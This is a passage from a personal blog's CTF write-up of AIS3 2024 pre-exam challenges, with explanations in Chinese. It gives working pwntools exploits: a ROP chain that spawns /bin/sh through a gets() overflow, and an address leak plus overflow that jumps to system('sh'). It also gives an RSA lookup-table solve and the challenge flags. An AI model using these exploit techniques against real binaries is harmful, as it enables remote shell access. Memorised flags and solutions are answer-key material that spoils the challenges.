<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="n">babyRSA</span> <span class="kn">import</span> <span class="n">encrypt</span>

<span class="c1"># input output.txt here
</span><span class="n">e</span><span class="p">,</span> <span class="n">n</span><span class="p">,</span> <span class="n">c</span> <span class="o">=</span> 

<span class="n">table</span> <span class="o">=</span> <span class="p">[]</span>

<span class="k">for</span> <span class="n">m</span> <span class="ow">in</span> <span class="nf">range</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mi">256</span><span class="p">):</span>
    <span class="n">table</span><span class="p">.</span><span class="nf">append</span><span class="p">(</span><span class="nf">encrypt</span><span class="p">((</span><span class="n">e</span><span class="p">,</span> <span class="n">n</span><span class="p">),</span> <span class="nf">chr</span><span class="p">(</span><span class="n">m</span><span class="p">))[</span><span class="mi">0</span><span class="p">])</span>

<span class="n">flag</span> <span class="o">=</span> <span class="sh">""</span>
<span class="k">for</span> <span class="n">crypt</span> <span class="ow">in</span> <span class="n">c</span><span class="p">:</span>
    <span class="n">flag</span> <span class="o">+=</span> <span class="nf">chr</span><span class="p">(</span><span class="n">table</span><span class="p">.</span><span class="nf">index</span><span class="p">(</span><span class="n">crypt</span><span class="p">)</span> <span class="o">+</span> <span class="mi">1</span><span class="p">)</span>
<span class="nf">print</span><span class="p">(</span><span class="n">flag</span><span class="p">)</span>
</code></pre></div></div>

<p><img src="/~b12902079/assets/images/AIS3-2024-pre-exam-writeup/babyrsa-solve.png" alt="image" /></p>

<h2 id="flag-11">Flag</h2>

<p><code class="language-plaintext highlighter-rouge">AIS3{NeverUseTheCryptographyLibraryImplementedYourSelf}</code></p>

<h1 id="mathter">Mathter</h1>

<h2 id="vulnerability-5">Vulnerability</h2>

<p>在 ghidra 中看到可以透過 <code class="language-plaintext highlighter-rouge">gets</code> 來 buffer overflow，且 NX enable 所以要使用 rop chain</p>

<p><img src="/~b12902079/assets/images/AIS3-2024-pre-exam-writeup/mather-vulnerability-1.png" alt="image" /></p>

<p><img src="/~b12902079/assets/images/AIS3-2024-pre-exam-writeup/mather-vulnerability-2.png" alt="image" /></p>

<h2 id="solve-12">Solve</h2>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="n">pwn</span> <span class="kn">import</span> <span class="o">*</span>

<span class="n">p</span> <span class="o">=</span> <span class="nf">remote</span><span class="p">(</span><span class="sh">"</span><span class="s">chals1.ais3.org</span><span class="sh">"</span><span class="p">,</span> <span class="mi">50001</span><span class="p">)</span>

<span class="c1"># use ROPgadget to find gadgets
</span><span class="n">pop_rdi</span> <span class="o">=</span> <span class="mh">0x0000000000402540</span> <span class="c1"># pop rdi ; ret
</span><span class="n">pop_rsi</span> <span class="o">=</span> <span class="mh">0x00000000004126a3</span> <span class="c1"># pop rsi ; ret
</span><span class="n">pop_rax_rdx_rbx</span> <span class="o">=</span> <span class="mh">0x000000000047b916</span> <span class="c1"># pop rax ; pop rdx ; pop rbx ; ret
</span><span class="n">mov</span> <span class="o">=</span> <span class="mh">0x0000000000419700</span> <span class="c1"># mov qword ptr [rdx], rax ; ret
</span><span class="n">syscall</span> <span class="o">=</span> <span class="mh">0x00000000004013ea</span> <span class="c1"># syscall
# an empty address for writing "/bin/sh" string
</span><span class="n">bin_sh</span> <span class="o">=</span> <span class="mh">0x00000000004bc000</span>

<span class="c1"># go to goodbye function
</span><span class="n">p</span><span class="p">.</span><span class="nf">sendline</span><span class="p">(</span><span class="sa">b</span><span class="sh">'</span><span class="s">q</span><span class="sh">'</span><span class="p">)</span>

<span class="c1"># build rop chain payload
</span><span class="n">payload</span> <span class="o">=</span> <span class="sa">b</span><span class="sh">""</span><span class="p">.</span><span class="nf">join</span><span class="p">([</span>
    <span class="c1"># pad to rbp
</span>    <span class="sa">b</span><span class="sh">'</span><span class="s">y</span><span class="sh">'</span><span class="p">,</span>
    <span class="sa">b</span><span class="sh">'</span><span class="s">A</span><span class="sh">'</span> <span class="o">*</span> <span class="mi">11</span><span class="p">,</span>

    <span class="c1"># write "/bin/sh"
</span>    <span class="nf">p64</span><span class="p">(</span><span class="n">pop_rax_rdx_rbx</span><span class="p">),</span>
    <span class="sa">b</span><span class="sh">'</span><span class="s">/bin/sh</span><span class="se">\x00</span><span class="sh">'</span><span class="p">,</span>
    <span class="nf">p64</span><span class="p">(</span><span class="n">bin_sh</span><span class="p">),</span>
    <span class="nf">p64</span><span class="p">(</span><span class="mh">0x0</span><span class="p">),</span>
    <span class="nf">p64</span><span class="p">(</span><span class="n">mov</span><span class="p">),</span>

    <span class="c1"># set rax to 0x3b for sys_execve syscall
</span>    <span class="c1"># set rdx to 0x00 for no envp[]
</span>    <span class="nf">p64</span><span class="p">(</span><span class="n">pop_rax_rdx_rbx</span><span class="p">),</span>
    <span class="nf">p64</span><span class="p">(</span><span class="mh">0x3b</span><span class="p">),</span>
    <span class="nf">p64</span><span class="p">(</span><span class="mh">0x0</span><span class="p">),</span>
    <span class="nf">p64</span><span class="p">(</span><span class="mh">0x0</span><span class="p">),</span>

    <span class="c1"># set rdi to address of "/bin/sh" string for filename to execute
</span>    <span class="nf">p64</span><span class="p">(</span><span class="n">pop_rdi</span><span class="p">),</span>
    <span class="nf">p64</span><span class="p">(</span><span class="n">bin_sh</span><span class="p">),</span>

    <span class="c1"># set rsi to 0x00 for no argv[]
</span>    <span class="nf">p64</span><span class="p">(</span><span class="n">pop_rsi</span><span class="p">),</span>
    <span class="nf">p64</span><span class="p">(</span><span class="mh">0x0</span><span class="p">),</span>

    <span class="c1"># trigger syscall
</span>    <span class="nf">p64</span><span class="p">(</span><span class="n">syscall</span><span class="p">)</span>
<span class="p">])</span>

<span class="c1"># send rop chain payload
</span><span class="n">p</span><span class="p">.</span><span class="nf">sendline</span><span class="p">(</span><span class="n">payload</span><span class="p">)</span>

<span class="c1"># for interactive shell
</span><span class="n">p</span><span class="p">.</span><span class="nf">interactive</span><span class="p">()</span>
</code></pre></div></div>

<p><img src="/~b12902079/assets/images/AIS3-2024-pre-exam-writeup/mather-solve.png" alt="image" /></p>

<h2 id="flag-12">Flag</h2>

<p><code class="language-plaintext highlighter-rouge">AIS3{0mg_k4zm4_mu57_b3_k1dd1ng_m3_2e89c9}</code></p>

<h1 id="base64-encoder">Base64 Encoder</h1>

<h2 id="solve-13">Solve</h2>

<p>從 <code class="language-plaintext highlighter-rouge">main</code> 可以看到 <code class="language-plaintext highlighter-rouge">scanf</code> 沒有限制長度可以 buffer overflow</p>

<p><img src="/~b12902079/assets/images/AIS3-2024-pre-exam-writeup/base64-encoder-solve-1.png" alt="image" /></p>

<p>從 gdb 看出要 pad 0x48 個字元才能蓋到 rbp</p>

<p><img src="/~b12902079/assets/images/AIS3-2024-pre-exam-writeup/base64-encoder-solve-2.png" alt="image" /></p>

<p>從 <code class="language-plaintext highlighter-rouge">base64_encoding</code> 看出可以讓 <code class="language-plaintext highlighter-rouge">table</code> 的 index 變成負的來 leak address，gdb break 在 <code class="language-plaintext highlighter-rouge">base64_encoding</code> 找出 <code class="language-plaintext highlighter-rouge">table</code> 前面的 address 為 <code class="language-plaintext highlighter-rouge">main+299</code></p>

<p><img src="/~b12902079/assets/images/AIS3-2024-pre-exam-writeup/base64-encoder-solve-3.png" alt="image" /></p>

<p><img src="/~b12902079/assets/images/AIS3-2024-pre-exam-writeup/base64-encoder-solve-4.png" alt="image" /></p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="n">pwn</span> <span class="kn">import</span> <span class="o">*</span>

<span class="c1"># a.out is the binaray with comment uncommented
</span><span class="n">p</span> <span class="o">=</span> <span class="nf">process</span><span class="p">(</span><span class="sh">"</span><span class="s">./a.out</span><span class="sh">"</span><span class="p">)</span>

<span class="c1"># find the input for getting negetive index
</span><span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nf">range</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mi">256</span><span class="p">):</span>
    <span class="k">if</span> <span class="n">i</span> <span class="o">==</span> <span class="mi">10</span><span class="p">:</span>
        <span class="k">continue</span>
    <span class="n">p</span><span class="p">.</span><span class="nf">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="sh">"</span><span class="s">Text:</span><span class="sh">"</span><span class="p">)</span>
    <span class="n">p</span><span class="p">.</span><span class="nf">sendline</span><span class="p">(</span><span class="sa">b</span><span class="sh">'</span><span class="se">\xff\xff</span><span class="sh">'</span> <span class="o">+</span> <span class="nf">chr</span><span class="p">(</span><span class="n">i</span><span class="p">).</span><span class="nf">encode</span><span class="p">())</span>
    <span class="nf">print</span><span class="p">(</span><span class="n">i</span><span class="p">,</span> <span class="n">p</span><span class="p">.</span><span class="nf">recvline</span><span class="p">())</span>
</code></pre></div></div>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="n">pwn</span> <span class="kn">import</span> <span class="o">*</span>

<span class="c1"># p = process("./base64encoder")
# gdb.attach(p)
</span><span class="n">p</span> <span class="o">=</span> <span class="nf">remote</span><span class="p">(</span><span class="sh">"</span><span class="s">chals1.ais3.org</span><span class="sh">"</span><span class="p">,</span> <span class="mi">50002</span><span class="p">)</span>

<span class="c1"># the value of index -1 to -8 of table is the address of main+299
# 63 b' Result: -1 -17 -4 -1\n'
# 62 b' Result: -1 -17 -4 -2\n'
# 61 b' Result: -1 -17 -4 -3\n'
# 60 b' Result: -1 -17 -4 -4\n'
# 59 b' Result: -1 -17 -4 -5\n'
# 58 b' Result: -1 -17 -4 -6\n'
# 57 b' Result: -1 -17 -4 -7\n'
# 56 b' Result: -1 -17 -4 -8\n'
</span>
<span class="n">main_299</span> <span class="o">=</span> <span class="mi">0</span>

<span class="c1"># leak main+299 address
</span><span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="p">[</span><span class="mi">63</span><span class="p">,</span> <span class="mi">62</span><span class="p">,</span> <span class="mi">61</span><span class="p">,</span> <span class="mi">60</span><span class="p">,</span> <span class="mi">59</span><span class="p">,</span> <span class="mi">58</span><span class="p">,</span> <span class="mi">57</span><span class="p">,</span> <span class="mi">56</span><span class="p">]:</span>
    <span class="n">p</span><span class="p">.</span><span class="nf">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="sh">"</span><span class="s">Text:</span><span class="sh">"</span><span class="p">)</span>
    <span class="n">p</span><span class="p">.</span><span class="nf">sendline</span><span class="p">(</span><span class="sa">b</span><span class="sh">'</span><span class="se">\xff\xff</span><span class="sh">'</span> <span class="o">+</span> <span class="nf">chr</span><span class="p">(</span><span class="n">i</span><span class="p">).</span><span class="nf">encode</span><span class="p">())</span>
    <span class="n">main_299</span> <span class="o">&lt;&lt;=</span> <span class="mi">8</span>
    <span class="n">main_299</span> <span class="o">|=</span> <span class="n">p</span><span class="p">.</span><span class="nf">recvline</span><span class="p">()[</span><span class="o">-</span><span class="mi">2</span><span class="p">]</span>

<span class="n">log</span><span class="p">.</span><span class="nf">success</span><span class="p">(</span><span class="nf">hex</span><span class="p">(</span><span class="n">main_299</span><span class="p">))</span>
<span class="c1"># calculate address of Vincent55Orz base on main+299
</span><span class="n">log</span><span class="p">.</span><span class="nf">success</span><span class="p">(</span><span class="nf">hex</span><span class="p">(</span><span class="n">main_299</span> <span class="o">-</span> <span class="mh">0x3cf</span><span class="p">))</span>
<span class="c1"># jump to Vincent55Orz for unknow reason doesn't work,
# so jump to system("sh") directly instead (+23 offset)
</span><span class="n">p</span><span class="p">.</span><span class="nf">sendline</span><span class="p">(</span><span class="sa">b</span><span class="sh">"</span><span class="s">A</span><span class="sh">"</span> <span class="o">*</span> <span class="mh">0x40</span> <span class="o">+</span> <span class="nf">p64</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="o">+</span> <span class="nf">p64</span><span class="p">(</span><span class="n">main_299</span> <span class="o">-</span> <span class="mh">0x3cf</span> <span class="o">+</span> <span class="mi">23</span><span class="p">))</span>
<span class="n">p</span><span class="p">.</span><span class="nf">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="sh">"</span><span class="s">Text:</span><span class="sh">"</span><span class="p">)</span>
<span class="c1"># send emptyline to trigger ret for main
</span><span class="n">p</span><span class="p">.</span><span class="nf">sendline</span><span class="p">()</span>

<span class="c1"># interactive shell
</span><span class="n">p</span><span class="p">.</span><span class="nf">interactive</span><span class="p">()</span>
</code></pre></div></div>

<p><img src="/~b12902079/assets/images/AIS3-2024-pre-exam-writeup/base64-encoder-solve-5.png" alt="image" /></p>

<h2 id="flag-13">Flag</h2>

<p><code class="language-plaintext highlighter-rouge">AIS3{1_g0t_WA_on_my_H0m3work_Do_YoU_h4v3_aNY_idea???_22281a41372450db}</code></p>
</div>
      </section>
      <footer>
  <p>&copy; 2024 - 2025 | Unicorn's Blog</p>
</footer>
<script src="/~b12902079/assets/js/mode.js" defer></script>

    </main>
    <section id="category-modal-bg"></section>
<section id="category-modal">
  <h1 id="category-modal-title"></h1>
  <section id="category-modal-content"></section>
</section>

  </body>
</html>
